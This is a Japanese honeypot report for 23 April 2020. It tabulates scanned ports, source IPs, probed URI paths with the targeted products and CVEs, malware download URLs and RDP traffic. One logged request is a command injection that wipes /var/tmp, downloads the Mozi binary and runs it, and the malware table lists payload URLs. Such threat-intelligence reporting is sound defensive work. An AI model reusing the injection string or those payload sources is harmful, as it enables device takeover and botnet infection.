【ハニーポット簡易分析】Honeypot簡易分析(2020/4/23)
ポート 110 番(POP3)の検知数が増加していました。通信自体は調査行為止まりでしたが。。。
Port(TOP20)
- Honeytrap
Port | Service | Count |
---|---|---|
1433 | Microsoft-SQL-Server | 173371 件 |
110 | Post Office Protocol - Version 3 | 3222 件 |
445 | Microsoft-DS | 2187 件 |
22 | The Secure Shell (SSH) Protocol | 1145 件 |
3390 | Distributed Service Coordinator | 479 件 |
3391 | SAVANT | 475 件 |
2222 | SSH | 228 件 |
8080 | HTTP Alternate (see port 80) | 174 件 |
3389 | MS WBT Server | 161 件 |
20000 | DNP | 109 件 |
873 | rsync | 100 件 |
389 | Lightweight Directory Access Protocol | 98 件 |
514 | cmd like exec, but automatic authentication is performed as for login server | 95 件 |
6093 | Unknown | 94 件 |
503 | Intrinsa | 91 件 |
2717 | PN REQUESTER | 91 件 |
1056 | VFO | 90 件 |
6001 | Unknown | 83 件 |
1041 | AK2 Product | 82 件 |
587 | Message Submission | 82 件 |
IP(TOP20)
01 Honeytrap
IP | Country | Count | AbuseIPDB |
---|---|---|---|
202[.]1[.]114[.]202 | Philippines | 27138 件 | Link |
36[.]78[.]201[.]226 | Indonesia | 25453 件 | Link |
106[.]3[.]43[.]25 | China | 17848 件 | Link |
103[.]205[.]140[.]73 | India | 12071 件 | Link |
185[.]202[.]1[.]19 | France | 11021 件 | Link |
31[.]156[.]3[.]35 | Italy | 10503 件 | Link |
116[.]232[.]155[.]70 | China | 8033 件 | Link |
115[.]75[.]48[.]138 | Vietnam | 7704 件 | Link |
160[.]202[.]65[.]90 | United States | 7589 件 | Link |
45[.]141[.]87[.]27 | Russia | 7532 件 | Link |
36[.]83[.]48[.]227 | Indonesia | 6638 件 | Link |
54[.]38[.]53[.]123 | France | 5651 件 | Link |
190[.]38[.]83[.]38 | Venezuela | 5309 件 | Link |
118[.]70[.]116[.]236 | Vietnam | 4573 件 | Link |
221[.]215[.]205[.]122 | China | 4468 件 | Link |
182[.]0[.]132[.]185 | Indonesia | 4319 件 | Link |
185[.]158[.]113[.]43 | Russia | 4284 件 | Link |
196[.]45[.]17[.]178 | South Africa | 3838 件 | Link |
197[.]50[.]113[.]185 | Egypt | 3697 件 | Link |
195[.]181[.]39[.]36 | Iran | 3501 件 | Link |
02 WOWHoneypot
IP | Country | Count | AbuseIPDB |
---|---|---|---|
45[.]146[.]253[.]35 | Germany | 36 件 | Link |
77[.]247[.]108[.]119 | Estonia | 8 件 | Link |
5[.]101[.]0[.]209 | Russia | 1 件 | Link |
85[.]104[.]114[.]115 | Turkey | 1 件 | Link |
58[.]96[.]242[.]120 | Singapore | 1 件 | Link |
85[.]99[.]96[.]13 | Turkey | 1 件 | Link |
41[.]203[.]212[.]101 | Kenya | 1 件 | Link |
203[.]106[.]219[.]34 | Malaysia | 1 件 | Link |
128[.]14[.]209[.]234 | United States | 1 件 | Link |
94[.]101[.]137[.]230 | Iran | 1 件 | Link |
91[.]238[.]28[.]127 | Russia | 1 件 | Link |
191[.]37[.]212[.]63 | Brazil | 1 件 | Link |
200[.]57[.]192[.]246 | Mexico | 1 件 | Link |
94[.]242[.]26[.]158 | Russia | 1 件 | Link |
139[.]99[.]141[.]237 | Australia | 1 件 | Link |
185[.]75[.]98[.]234 | Iraq | 1 件 | Link |
86[.]104[.]10[.]9 | Romania | 1 件 | Link |
192[.]241[.]238[.]141 | United States | 1 件 | Link |
85[.]238[.]106[.]16 | Ukraine | 1 件 | Link |
179[.]124[.]214[.]77 | Brazil | 1 件 | Link |
03 WOWHoneypot(SSL)
IP | Country | Count | AbuseIPDB |
---|---|---|---|
45[.]146[.]253[.]35 | Germany | 36 件 | Link |
77[.]247[.]108[.]119 | Estonia | 8 件 | Link |
5[.]101[.]0[.]209 | Russia | 1 件 | Link |
85[.]104[.]114[.]115 | Turkey | 1 件 | Link |
58[.]96[.]242[.]120 | Singapore | 1 件 | Link |
85[.]99[.]96[.]13 | Turkey | 1 件 | Link |
41[.]203[.]212[.]101 | Kenya | 1 件 | Link |
203[.]106[.]219[.]34 | Malaysia | 1 件 | Link |
128[.]14[.]209[.]234 | United States | 1 件 | Link |
94[.]101[.]137[.]230 | Iran | 1 件 | Link |
91[.]238[.]28[.]127 | Russia | 1 件 | Link |
191[.]37[.]212[.]63 | Brazil | 1 件 | Link |
200[.]57[.]192[.]246 | Mexico | 1 件 | Link |
94[.]242[.]26[.]158 | Russia | 1 件 | Link |
139[.]99[.]141[.]237 | Australia | 1 件 | Link |
185[.]75[.]98[.]234 | Iraq | 1 件 | Link |
86[.]104[.]10[.]9 | Romania | 1 件 | Link |
192[.]241[.]238[.]141 | United States | 1 件 | Link |
85[.]238[.]106[.]16 | Ukraine | 1 件 | Link |
179[.]124[.]214[.]77 | Brazil | 1 件 | Link |
URI Path
NEW URI Path
01 Honeytrap
URI Path | Target | CVE | Memo |
---|---|---|---|
/sdk | NMAP | - | - |
/remote/login | FortiGate Firewall's SSL-VPN | - | Link |
02 WOWHoneypot
URI Path | Target | CVE | Memo |
---|---|---|---|
/WSMAN | WS-Management (WSMan) | - | - |
03 WOWHoneypot(SSL)
URI Path | Target | CVE | Memo |
---|---|---|---|
/mOh9 | - | - | - |
/MAPI/APIUnknown | - | - | - |
URI Path
01 Honeytrap
URI Path | Target | CVE | Count |
---|---|---|---|
No uri path | - | - | 205723 件 |
/ | - | - | 465 件 |
/picsdesc[.]xml | Realtek SDK | CVE-2014-8361 | 69 件 |
/nice | - | - | 22 件 |
login[.]cgi | D-Link Router | - | 21 件 |
/ctrlt/DeviceUpgrade_1 | Huawei Home Device | - | 20 件 |
sip:nm | Session Initiation Protocol | - | 20 件 |
hxxp://checkip[.]amazonaws[.]com/ | Unauthorized relay | - | 16 件 |
/ws/v1/cluster/apps/new-application | Apache Hadoop | - | 12 件 |
hxxp://pv[.]sohu[.]com/cityjson | Unauthorized relay | - | 12 件 |
/cgi | CGI | - | 11 件 |
/api | api | - | 11 件 |
/version | - | - | 11 件 |
/server-info | Apache | - | 10 件 |
SERVER | - | - | 10 件 |
/_ping | Unknown | - | 9 件 |
/hazelcast/rest/cluster | Open-Xchange AppSuite | CVE-2013-5936 | 8 件 |
hxxp://clientapi[.]ipip[.]net/echo[.]php | Unauthorized relay | - | 8 件 |
/dana-na/auth/url_default/welcome[.]cgi | Pulse/Juniper Networks SA2000 SSL VPN | CVE-2019-11539/ | 5 件 |
/admin/assets/js/views/login[.]js | FreePBX | - | 4 件 |
/v1[.]40/containers/json | Docker Engine API | - | 4 件 |
hxxp://112[.]124[.]42[.]80:63435/ | Unauthorized relay | - | 4 件 |
/Telerik[.]Web[.]UI[.]WebResource[.]axd | Telerik | - | 3 件 |
/_search | Elasticsearch | - | 3 件 |
/jmx | JMX | - | 3 件 |
hxxp://example[.]com/ | Unauthorized relay | - | 2 件 |
/json_rpc | JSON-RPC | - | 2 件 |
/wls-wsat/CoordinatorPortType11 | Weblogic | CVE-2017-10271 | 2 件 |
/nmaplowercheck1587599427 | Nmap | - | 2 件 |
/HNAP1 | Linksys Router | D-Link Router | 2 件 |
/evox/about | Nmap | - | 2 件 |
/sdk | New | - | 2 件 |
/nmaplowercheck1587646230 | Nmap | - | 2 件 |
/service/extdirect | Sonatype Nexus Repository Manager | CVE-2019-7238 | 1 件 |
/jars | Unknown | - | 1 件 |
rtsp://160[.]16[.]145[.]183:1025 | Real Time Streaming Protocol | - | 1 件 |
/live/CPEManager/AXCampaignManager/delet e_cpes_by_ids |
Zyxel CNM SecuManager | - | 1 件 |
/tmUnblock[.]cgi | Linksys E-series | - | 1 件 |
/api/anonymous/cookie/post | api | - | 1 件 |
/stats | - | - | 1 件 |
/db/manage/ | Database | - | 1 件 |
/editBlackAndWhiteList | DVR/NVR/IPC API | - | 1 件 |
/versions | - | - | 1 件 |
/v1[.]16/version | - | - | 1 件 |
/remote/login | New | - | 1 件 |
/cgi-bin/luci | CGI | - | 1 件 |
/login[.]htm | Login Page | - | 1 件 |
/shell | MVPower DVR | - | 1 件 |
RTSP://160[.]16[.]145[.]183:8554/ | Real Time Streaming Protocol | - | 1 件 |
/ipp | CUPS | CVE-2015-1158 | 1 件 |
/GponForm/diag_Form | DASAN Network Solutions | CVE-2018-10561 | 1 件 |
/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${ IFS}*;${IFS}wget${IFS}hxxp://192[.]168[. ]1[.]1:8088/Mozi[.]m;${IFS}sh${IFS}/var/ tmp/Mozi[.]m |
CGI | - | 1 件 |
/solr/admin/info/system | Apache Solr | - | 1 件 |
/hudson | Unknown | - | 1 件 |
02 WOWHoneypot
URI Path | Target | CVE | Count |
---|---|---|---|
/ | - | - | 35 件 |
/phpMyAdmin/scripts/setup[.]php | phpMyAdmin | - | 18 件 |
/cgi-bin/mainfunction[.]cgi | DrayTek | CVE-2020-8515 | 8 件 |
/admin/assets/js/views/login[.]js | FreePBX | - | 8 件 |
/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
/pma/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
/myadmin/scripts/setup[.]php | Administrator | - | 2 件 |
/MyAdmin/scripts/setup[.]php | Administrator | - | 2 件 |
/mysql/scripts/setup[.]php | MySQL | - | 2 件 |
/sqladmin/scripts/setup[.]php | SQLAdmin | - | 2 件 |
/phpmyadmin2/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
/db/scripts/setup[.]php | Database | - | 2 件 |
/scripts/setup[.]php | PHPMyAdmin | - | 2 件 |
/vendor/phpunit/phpunit/src/Util/PHP/eva l-stdin[.]php |
PHPUnit | CVE-2017-9841 | 1 件 |
/portal/redlion | Unknown | - | 1 件 |
/Telerik[.]Web[.]UI[.]WebResource[.]axd | Telerik | - | 1 件 |
/WSMAN | New | - | 1 件 |
/hudson | Unknown | - | 1 件 |
/ReportServer | SQL Server Reporting Services | CVE-2020-0618 | 1 件 |
03 WOWHoneypot(SSL)
URI Path | Target | CVE | Count |
---|---|---|---|
/admin/assets/js/views/login[.]js | FreePBX | - | 8 件 |
/ | - | - | 8 件 |
/Telerik[.]Web[.]UI[.]WebResource[.]axd | Telerik | - | 1 件 |
/mOh9 | New | - | 1 件 |
/owa/auth/logon[.]aspx | Microsoft Exchange Server | CVE-2018-16793 | 1 件 |
/MAPI/API | New | - | 1 件 |
Malware
- Honeytrap
Malware | Count |
---|---|
No Malware | 206486 件 |
hxxp://51[.]255[.]170[.]237/pandora[.]mips | 12 件 |
hxxp://d[.]powerofwish[.]com/pm[.]sh | 6 件 |
hxxp://178[.]33[.]64[.]107/arm7 | 4 件 |
hxxp://19ce033f[.]ngrok[.]io/arm7 | 4 件 |
hxxp://212[.]114[.]52[.]128/arm7 | 2 件 |
hxxp://192[.]168[.]1[.]1:8088/Mozi[.]m | 2 件 |
hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh | 1 件 |
hxxp://194[.]180[.]224[.]124/bins/mpsl | 1 件 |
hxxp://164[.]132[.]92[.]180/xtc[.]arm7 | 1 件 |
hxxp://185[.]62[.]189[.]18/jaws[.]sh | 1 件 |
hxxp://176[.]123[.]3[.]96/arm7 | 1 件 |
RDP
Port/IP
Port | IP | Country | Count | AbuseIPDB |
---|---|---|---|---|
110 | 185[.]158[.]113[.]43 | Russia | 3220 件 | Link |
3391 | 209[.]45[.]61[.]241 | Peru | 466 件 | Link |
3390 | 209[.]45[.]61[.]241 | Peru | 465 件 | Link |
3389 | 95[.]47[.]248[.]84 | Ukraine | 80 件 | Link |
3389 | 222[.]235[.]220[.]206 | South Korea | 14 件 | Link |
27295 | 185[.]202[.]2[.]120 | France | 5 件 | Link |
24884 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
18096 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
19899 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
17161 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
16842 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
16761 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
23854 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
19512 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
23375 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
23586 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
19829 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
24966 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
19918 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
24944 | 185[.]202[.]1[.]19 | France | 4 件 | Link |
Port
Port | Count |
---|---|
110 | 3221 件 |
3390 | 476 件 |
3391 | 474 件 |
3389 | 150 件 |
20000 | 9 件 |
23854 | 8 件 |
23520 | 8 件 |
23586 | 7 件 |
24673 | 7 件 |
17841 | 7 件 |
23015 | 7 件 |
23112 | 7 件 |
23475 | 7 件 |
23132 | 7 件 |
23574 | 7 件 |
17725 | 7 件 |
22920 | 7 件 |
23906 | 7 件 |
19602 | 7 件 |
24260 | 7 件 |
IP
IP | Country | Count | AbuseIPDB |
---|---|---|---|
185[.]202[.]1[.]19 | France | 11021 件 | Link |
45[.]141[.]87[.]27 | Russia | 7532 件 | Link |
185[.]158[.]113[.]43 | Russia | 4284 件 | Link |
185[.]202[.]2[.]120 | France | 974 件 | Link |
209[.]45[.]61[.]241 | Peru | 931 件 | Link |
185[.]202[.]1[.]10 | France | 788 件 | Link |
185[.]202[.]1[.]248 | France | 308 件 | Link |
79[.]124[.]62[.]254 | Bulgaria | 224 件 | Link |
195[.]54[.]167[.]115 | Russia | 173 件 | Link |
185[.]202[.]1[.]85 | France | 138 件 | Link |
95[.]47[.]248[.]84 | Ukraine | 80 件 | Link |
185[.]202[.]0[.]25 | United Kingdom | 60 件 | Link |
185[.]153[.]196[.]99 | Russia | 58 件 | Link |
185[.]153[.]199[.]12 | Russia | 52 件 | Link |
185[.]202[.]1[.]249 | France | 38 件 | Link |
222[.]235[.]220[.]206 | South Korea | 14 件 | Link |
185[.]202[.]2[.]52 | France | 11 件 | Link |
185[.]176[.]221[.]207 | Latvia | 10 件 | Link |
141[.]98[.]81[.]254 | Panama | 9 件 | Link |
185[.]202[.]2[.]247 | France | 8 件 | Link |
Port 1433
IP | Country | Count | AbuseIPDB |
---|---|---|---|
202[.]1[.]114[.]202 | Philippines | 27138 件 | Link |
36[.]78[.]201[.]226 | Indonesia | 25453 件 | Link |
106[.]3[.]43[.]25 | China | 17848 件 | Link |
103[.]205[.]140[.]73 | India | 12071 件 | Link |
31[.]156[.]3[.]35 | Italy | 10503 件 | Link |
116[.]232[.]155[.]70 | China | 8033 件 | Link |
115[.]75[.]48[.]138 | Vietnam | 7704 件 | Link |
160[.]202[.]65[.]90 | United States | 7589 件 | Link |
36[.]83[.]48[.]227 | Indonesia | 6638 件 | Link |
54[.]38[.]53[.]123 | France | 5651 件 | Link |
190[.]38[.]83[.]38 | Venezuela | 5309 件 | Link |
118[.]70[.]116[.]236 | Vietnam | 4573 件 | Link |
221[.]215[.]205[.]122 | China | 4468 件 | Link |
182[.]0[.]132[.]185 | Indonesia | 4319 件 | Link |
196[.]45[.]17[.]178 | South Africa | 3838 件 | Link |
197[.]50[.]113[.]185 | Egypt | 3697 件 | Link |
195[.]181[.]39[.]36 | Iran | 3501 件 | Link |
157[.]42[.]246[.]229 | India | 2484 件 | Link |
36[.]90[.]60[.]64 | Indonesia | 1993 件 | Link |
190[.]73[.]68[.]118 | Venezuela | 1562 件 | Link |